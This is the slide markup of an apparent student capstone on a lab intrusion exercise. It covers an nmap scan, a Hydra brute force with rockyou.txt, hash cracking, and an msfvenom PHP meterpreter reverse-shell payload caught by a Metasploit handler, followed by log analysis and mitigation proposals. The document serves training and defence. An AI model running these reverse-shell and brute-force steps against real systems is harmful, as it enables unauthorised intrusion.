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D18FB5-0AA9-40AB-AD69-6C56BC0B1338}">
  <a:tblStyle styleId="{15D18FB5-0AA9-40AB-AD69-6C56BC0B1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fcce0ff590_0_10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fcce0ff590_0_10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fcce0ff59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fcce0ff5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fcce0ff590_0_1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fcce0ff590_0_1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fcce0ff590_0_12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fcce0ff590_0_1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fcce0ff590_0_13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fcce0ff590_0_13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fcce0ff590_0_14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fcce0ff590_0_14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fcce0ff590_0_2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fcce0ff590_0_2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fcce0ff590_0_3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fcce0ff590_0_3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fcce0ff590_0_4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fcce0ff590_0_4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fcce0ff590_0_5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fcce0ff590_0_5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fcce0ff590_0_6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fcce0ff590_0_6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fcce0ff590_0_7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fcce0ff590_0_7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fcce0ff590_0_8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fcce0ff590_0_8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fcce0ff590_0_9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fcce0ff590_0_9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80.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58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69.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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00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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId5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png"/><Relationship Id="rId4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crackstation.ne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png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TCP Reverse Shell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4" name="Google Shape;1134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Reverse shell, delivered by multi-handler exploit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7" name="Google Shape;1137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8" name="Google Shape;113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9" name="Google Shape;113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Granted us access to be able to fully view all directories, and find the flag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5" name="Google Shape;1145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6" name="Google Shape;114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Msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt; open_shell.php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Manually move payload to /web.dav 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Set options for LHOST and LPORT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 msf5 prompt: exploit(multi/handler) &gt; exploit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TCP Reverse Shell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5" name="Google Shape;1155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Reverse shell, delivered by multi-handler exploit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8" name="Google Shape;1158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9" name="Google Shape;1159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0" name="Google Shape;1160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2" name="Google Shape;1162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3" name="Google Shape;1163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4" name="Google Shape;1164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Granted us access to be able to fully view all directories, and find the flag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6" name="Google Shape;1166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7" name="Google Shape;1167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8" name="Google Shape;1168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Msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt; open_shell.php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Manually move payload to /web.dav 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Set options for LHOST and LPORT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 msf5 prompt: exploit(multi/handler) &gt; exploit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7" name="Google Shape;1177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3" name="Google Shape;1183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84" name="Google Shape;11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975"/>
            <a:ext cx="9143999" cy="310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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83325" y="3818250"/>
            <a:ext cx="533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port scan occur? 11pm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packets were sent, and from which IP? 27.5MB packets were sent from 192.168.1.90.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indicates that this was a port scan? The peak in traffic indicates a port scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6088800" y="834100"/>
            <a:ext cx="27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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329750" y="1195525"/>
            <a:ext cx="53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3" name="Google Shape;1193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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33740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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>7 AM on the 17th of November 2020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made? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>109,843 requests were made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b="1" lang="en" sz="1200"/>
              <a:t>/secret_folder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did they contain? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>The /secret_folder contained valuable information and also allowed me to upload a payload and exploit it’s vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1195" name="Google Shape;11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00" y="10615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975" y="2201075"/>
            <a:ext cx="7753325" cy="2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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337400" y="741300"/>
            <a:ext cx="8439900" cy="1459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3" name="Google Shape;1203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4" name="Google Shape;120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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body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10,463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7</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207" name="Google Shape;12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68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2486" l="2131" r="7148" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1437350"/>
            <a:ext cx="3295700" cy="23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8100" y="1437350"/>
            <a:ext cx="4020950" cy="244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5" name="Google Shape;1215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6" name="Google Shape;1216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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body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94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600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Which files were requested? passwd.dav</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1218" name="Google Shape;12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88" y="1677425"/>
            <a:ext cx="78200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6" name="Google Shape;1226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32" name="Google Shape;123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 Alert if any traffic from a single IP is going to multiple different ports.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Any non Trusted IP attempting access to closed ports will activate the alert.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;123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install a IDS/IPS software as well as a firewall to shut down scans of the network.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Filter traffic from any untrusted IP by IPS/IDS can result in little to no port scans.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40" name="Google Shape;124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alarm will trigger if non trusted IP attempts to access the directory.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is 1 attempt, for any non trusted IP</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242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Take the directory off the server entirely, as to not allow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Rmdir -r  will remove all file recursively(both parent and child folders) so assure nothing is left behind. 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8" name="Google Shape;124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alert for any error code (401 Unauthorized) is returned over a threshold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Allow a number of human error maybe 3-5 attempts over an allotted time frame.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250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Limit failed attempts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Limit logins to only trusted IP sources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Make policies for server to limit failed logins.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56" name="Google Shape;125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alert for non trusted IP trying to access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Alert for any IP not in the server range trying to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 1 attempt then alert is triggered.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8" name="Google Shape;1258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Disable connections to this over the web, or if web connection is needed only allow over VPN or Firewall.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ports 80 and 443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Blacklist any external IP addresses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4" name="Google Shape;1264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alert for .php files uploaded.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 firewall to turn off port 80,443,4444 connection to folders.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Any attempt will trigger the alert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6" name="Google Shape;1266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Disable web upload of files to shared directories, only allow local uploads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Block 80,443,4444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Range:192.168.1.1/24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Hostname:Hyper-V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 (Kali)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841400"/>
            <a:ext cx="6699600" cy="406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{15D18FB5-0AA9-40AB-AD69-6C56BC0B1338}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(Log Aggregation)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{15D18FB5-0AA9-40AB-AD69-6C56BC0B1338}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="39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0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Webserver directories are open to the public and navigable in a browser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gather a lot of information from open directories. They can use this information and access to launch attacks and malicious contents.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Multiple attempts using different usernames and passwords are used to try and force entry.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cause high network traffic but also can eventually allow entry to sensitive material.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hashed passwords can be cracked with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www.crackstation.net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a password is cracked, an attacker knowing the user name can access that user’s system files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Usernames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having a simple username, as in just your first or last names,  this can be easily socially engineered.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such as Hannah, Ryan, and ashton are all easy and simple names that can be discovered by social engineering.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Directory Listing Vulnerability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 Listing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kali machine to nmap services in the subnet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-sV 192.168.1.0/24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Able to find ip address for capstone 192.1681.105. Access the webserver directory and look at all the folders. Saw a secret folder in the company folders (target for our brute force attack).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Saw three potential users in the meet our team folder with user ashton used in brute forcing secret folder.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6" name="Google Shape;11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850" y="1421375"/>
            <a:ext cx="2932149" cy="9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850" y="2398725"/>
            <a:ext cx="2932149" cy="228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tools &amp; processes that were made to execute this was to use Hydra and obtain a password list from the file rockyou.txt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the exploit, I was able to obtain and confirm the login and password for “ashton”. The password for “ashton”  was “leopoldo”.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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7239056" y="1647853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7" name="Google Shape;11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75" y="2422357"/>
            <a:ext cx="2743324" cy="29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813" y="2962175"/>
            <a:ext cx="2371501" cy="41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